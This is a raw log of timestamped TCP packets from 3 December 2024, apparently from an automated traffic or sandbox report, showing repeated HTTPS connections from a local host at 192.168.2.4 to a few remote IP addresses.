                                            Dec 3, 2024 09:57:55.646553040 CET49788443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.646563053 CET4434978813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.646570921 CET49788443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.646574020 CET4434978813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.648925066 CET49792443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.648946047 CET4434979213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.649023056 CET49792443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.649142027 CET49792443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.649152994 CET4434979213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.720056057 CET4434978713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.720102072 CET4434978713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.720247984 CET49787443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.720278025 CET49787443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.720292091 CET4434978713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.720299959 CET49787443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.720304966 CET4434978713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.722060919 CET49793443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.722079039 CET4434979313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.722147942 CET49793443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.722274065 CET49793443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.722285032 CET4434979313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.828344107 CET4434978913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.828414917 CET4434978913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.828583002 CET49789443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.828608990 CET49789443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.828627110 CET4434978913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.828644037 CET49789443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.828649998 CET4434978913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.831259012 CET49794443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.831290007 CET4434979413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.831372023 CET49794443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.831515074 CET49794443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.831523895 CET4434979413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.328268051 CET4434979013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.328759909 CET49790443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.328784943 CET4434979013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.330024004 CET49790443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.330030918 CET4434979013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.367309093 CET4434979213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.367690086 CET49792443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.367712975 CET4434979213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.368210077 CET49792443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.368216038 CET4434979213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.391617060 CET4434979113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.391906977 CET49791443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.391921997 CET4434979113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.392401934 CET49791443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.392407894 CET4434979113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.501899958 CET4434979313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.502405882 CET49793443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.502437115 CET4434979313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.503009081 CET49793443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.503014088 CET4434979313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.676224947 CET4434979413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.676676035 CET49794443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.676692963 CET4434979413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.677248955 CET49794443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.677256107 CET4434979413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.763523102 CET4434979013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.763587952 CET4434979013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.763641119 CET49790443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.763817072 CET49790443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.763833046 CET4434979013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.763844013 CET49790443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.763849020 CET4434979013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.769869089 CET49795443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:57.769887924 CET49796443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.769901991 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:57.769902945 CET4434979613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.769982100 CET49795443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:57.770335913 CET49796443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.770338058 CET49795443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:57.770349026 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:57.770385981 CET49796443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.770397902 CET4434979613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.802589893 CET4434979213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.802643061 CET4434979213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.802692890 CET49792443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.802812099 CET49792443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.802825928 CET4434979213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.802836895 CET49792443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.802840948 CET4434979213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.805231094 CET49797443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.805259943 CET4434979713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.805337906 CET49797443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.805466890 CET49797443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.805479050 CET4434979713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.835782051 CET4434979113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.835834026 CET4434979113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.835906029 CET49791443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.836076975 CET49791443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.836086035 CET4434979113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.836107016 CET49791443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.836116076 CET4434979113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.838546038 CET49798443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.838558912 CET4434979813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:57.838627100 CET49798443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.838761091 CET49798443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:57.838769913 CET4434979813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.024703026 CET4434979313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.024769068 CET4434979313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.024823904 CET49793443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.025003910 CET49793443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.025021076 CET4434979313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.025033951 CET49793443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.025038958 CET4434979313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.028075933 CET49799443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.028110027 CET4434979913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.028198004 CET49799443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.028346062 CET49799443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.028358936 CET4434979913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.315130949 CET4434979413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.315197945 CET4434979413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.315256119 CET49794443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.315406084 CET49794443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.315418959 CET4434979413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.315428972 CET49794443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.315434933 CET4434979413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.317411900 CET49800443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.317450047 CET4434980013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:58.317513943 CET49800443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.317631960 CET49800443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:58.317643881 CET4434980013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.330497026 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:59.330740929 CET49795443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:59.330764055 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:59.331072092 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:59.331475019 CET49795443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:59.331547022 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:59.331597090 CET49795443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:59.375332117 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:59.634785891 CET4434979713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.635226011 CET49797443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:59.635251045 CET4434979713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.635634899 CET49797443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:59.635643005 CET4434979713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.652189970 CET4434979613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.652510881 CET49796443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:59.652545929 CET4434979613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.652808905 CET49796443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:59.652812958 CET4434979613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.788052082 CET4434979913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.788333893 CET49799443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:59.788351059 CET4434979913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.788640022 CET49799443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:59.788645029 CET4434979913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.797415018 CET4434979813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.797907114 CET49798443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:59.797914982 CET4434979813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:59.798763990 CET49798443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:59.798767090 CET4434979813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.057193041 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:00.057394028 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:00.057447910 CET49795443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:00.058377981 CET49795443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:00.058392048 CET44349795149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:00.064585924 CET49801443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:00.064625978 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:00.064701080 CET49801443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:00.064893007 CET49801443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:00.064908981 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:00.069375992 CET4434979713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.069451094 CET4434979713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.069495916 CET49797443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.069653034 CET49797443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.069668055 CET4434979713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.069679976 CET49797443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.069684982 CET4434979713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.072365999 CET49802443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.072396994 CET4434980213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.072477102 CET49802443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.072624922 CET49802443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.072638035 CET4434980213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.096426964 CET4434979613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.096476078 CET4434979613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.096525908 CET49796443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.096649885 CET49796443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.096658945 CET4434979613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.096690893 CET49796443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.096697092 CET4434979613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.098453999 CET49803443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.098473072 CET4434980313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.098535061 CET49803443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.098656893 CET49803443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.098665953 CET4434980313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.099647999 CET4434980013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.099940062 CET49800443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.099952936 CET4434980013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.100311995 CET49800443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.100316048 CET4434980013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.225033998 CET4434979913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.225086927 CET4434979913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.225135088 CET49799443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.225225925 CET49799443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.225236893 CET4434979913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.225245953 CET49799443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.225249052 CET4434979913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.227135897 CET49804443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.227169037 CET4434980413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.227240086 CET49804443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.227358103 CET49804443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.227370024 CET4434980413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.241511106 CET4434979813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.241554022 CET4434979813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.241596937 CET49798443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.241713047 CET49798443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.241718054 CET4434979813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.241749048 CET49798443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.241753101 CET4434979813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.243357897 CET49805443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.243385077 CET4434980513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.243453026 CET49805443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.243566036 CET49805443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.243578911 CET4434980513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.543999910 CET4434980013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.544044971 CET4434980013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.544110060 CET49800443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.544266939 CET49800443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.544277906 CET4434980013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.544289112 CET49800443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.544292927 CET4434980013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.546684980 CET49806443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.546705961 CET4434980613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:00.546782017 CET49806443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.546933889 CET49806443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:00.546943903 CET4434980613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:01.481849909 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:01.482197046 CET49801443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:01.482219934 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:01.482513905 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:01.482800961 CET49801443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:01.482857943 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:01.482922077 CET49801443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:01.523338079 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:01.877441883 CET4434980313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:01.878108978 CET49803443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:01.878132105 CET4434980313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:01.878576994 CET49803443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:01.878581047 CET4434980313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:01.920106888 CET4434980213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:01.920450926 CET49802443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:01.920480967 CET4434980213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:01.920793056 CET49802443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:01.920798063 CET4434980213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:01.958467960 CET4434980513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:01.958954096 CET49805443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:01.958980083 CET4434980513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:01.959270000 CET49805443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:01.959275007 CET4434980513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.007153988 CET4434980413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.007582903 CET49804443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.007611036 CET4434980413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.007962942 CET49804443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.007966995 CET4434980413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.017343998 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:02.017416954 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:02.017472029 CET49801443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:02.018393040 CET49801443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:58:02.018414021 CET44349801149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:58:02.262725115 CET4434980613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.263201952 CET49806443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.263233900 CET4434980613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.263621092 CET49806443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.263627052 CET4434980613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.328892946 CET4434980313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.328953028 CET4434980313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.329066992 CET49803443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.329370975 CET49803443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.329390049 CET4434980313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.329399109 CET49803443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.329404116 CET4434980313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.331865072 CET49807443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.331898928 CET4434980713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.331979036 CET49807443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.332083941 CET49807443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.332098007 CET4434980713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.374371052 CET4434980213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.374445915 CET4434980213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.374499083 CET49802443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.374650002 CET49802443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.374666929 CET4434980213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.374677896 CET49802443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.374682903 CET4434980213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.377161026 CET49808443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.377178907 CET4434980813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.377258062 CET49808443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.377401114 CET49808443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.377412081 CET4434980813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.392792940 CET4434980513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.392849922 CET4434980513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.392894983 CET49805443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.392986059 CET49805443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.392997980 CET4434980513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.393007040 CET49805443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.393011093 CET4434980513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.394912958 CET49809443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.394926071 CET4434980913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.394998074 CET49809443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.395227909 CET49809443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.395239115 CET4434980913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.451586962 CET4434980413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.451639891 CET4434980413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.451700926 CET49804443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.451822042 CET49804443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.451834917 CET4434980413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.451843977 CET49804443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.451848030 CET4434980413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.453771114 CET49810443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.453778982 CET4434981013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.453850031 CET49810443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.453991890 CET49810443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.453999043 CET4434981013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.698760986 CET4434980613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.698810101 CET4434980613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.698862076 CET49806443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.699040890 CET49806443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.699050903 CET4434980613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.699059963 CET49806443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.699064016 CET4434980613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.701716900 CET49811443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.701744080 CET4434981113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:02.701828957 CET49811443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.701978922 CET49811443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:02.701991081 CET4434981113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:03.602731943 CET44349784172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:58:03.602797985 CET44349784172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:58:03.602889061 CET49784443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:58:04.095496893 CET4434980813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.096014023 CET49808443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.096040964 CET4434980813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.096472979 CET49808443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.096477032 CET4434980813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.181694031 CET4434980713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.182043076 CET49807443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.182060957 CET4434980713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.182385921 CET49807443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.182389975 CET4434980713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.238454103 CET4434980913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.238843918 CET49809443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.238866091 CET4434980913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.239135981 CET49809443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.239140987 CET4434980913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.299501896 CET4434981013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.299797058 CET49810443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.299814939 CET4434981013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.300085068 CET49810443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.300088882 CET4434981013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.538722992 CET4434980813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.538809061 CET4434980813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.538866997 CET49808443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.539180040 CET49808443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.539197922 CET4434980813.107.246.63192.168.2.4
